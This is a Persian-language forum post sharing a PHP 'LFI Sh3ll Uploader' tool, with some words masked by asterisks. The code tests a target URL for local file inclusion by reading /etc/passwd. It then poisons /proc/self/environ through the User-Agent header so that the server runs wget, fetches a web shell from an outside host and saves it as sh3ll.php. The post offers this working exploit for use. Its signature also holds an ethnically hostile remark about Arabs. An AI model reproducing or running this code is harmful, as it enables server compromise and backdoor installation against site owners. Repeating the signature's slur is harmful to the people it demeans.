SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Php Script Lfi Shell Uploader Tools

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Php Script Lfi Shell Uploader Tools

    [align=LEFT][php]

    <html>
    <head>
    <title>Simple LFI Sh3ll Uploader</title>
    <style type="****/css">
    **** {
    background-color: #000000;
    font-family:"Courier New";
    color: silver;
    font-size:11px;
    }
    input {
    background-color: #000000;
    font-family:"Courier New";
    color: silver;
    font-size:11px;
    border:1px solid;
    border-color:silver;
    }
    </style>
    </head>
    <****>
    <h3>Simple LFI Sh3ll Uploader</h3>
    <form method="post" action="">
    LFI URL: <input type="****" size="60" ****="lfiurl" value="">
    <input type="submit" value="Fvck that!">
    </form>
    <?php
    if($_POST['lfiurl']) {
    print "<pre>";
    $target = $_POST['lfiurl'];
    $testlfi = "../../../../../../../../../../../../../../../etc/passwd%00";
    $readenv = "../../../../../../../../../../../../../../../proc/self/environ%00";
    $mbooh = preg_split("/.php/", $target);
    $pecah = preg_split("/\//", $mbooh[0]);
    $path = "/";
    $azz = count($pecah) - 1;
    for($g = 3; $g<$azz;$g++) {
    $path.= $pecah[$g]."/";
    }
    $bug = $pecah[$azz].".php".$mbooh[1];
    $host = $pecah[2];
    print "[+] Testing LFI ... ";
    flush();
    $res = FetchURL($target.$testlfi);
    if(preg_match("/root:x:0:0/", $res)) {
    print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
    flush();
    $rez = FetchURL($target.$readenv);
    if(preg_match("/********_ROOT=/", $rez)) {
    print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
    flush();
    $cmd = "<?php system('wget http://www.dallasdesigngroup.com/UserFiles/sh3ll.txt -O sh3ll.php');?>";
    $soket = fsockopen($host, 80);
    $req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
    fputs($soket, $req);
    fclose($soket);
    flush();
    $cek = FetchURL("http://".$host.$path."sh3ll.php");
    if(preg_match("/gblack Was Here/", $cek)) {
    print "[+] Exploit successful!<br>[+] Shell uploaded to <font color='green'>http://".$host.$path."sh3ll.php</font>";
    } else {
    print "<font color='red'>[!] Exploit failed!</font><br>";
    }
    }
    else {
    print "<font color='red'>Failed</font><br>";
    }
    } else {
    print "<font color='red'>Failed</font><br>";
    }
    }
    function FetchURL($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
    curl_setopt($ch, CURLOPT_FOLLOW********, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $data = curl_exec($ch);
    if(!$data) {
    return false;
    }
    return $data;
    }
    ?>
    <br>
    Copyleft &copy; 2010 by gblack
    </****>
    </html>


    [/php][/align]
    کوروش خلیجتو خلیج عرب نامیدن ، ولی بازم عربو تو وطن راه میدن همون عربهای که هستن تشنه به خونمون همونا که دخترا رو کردن زنده به گورشون
صبر کنید ..
X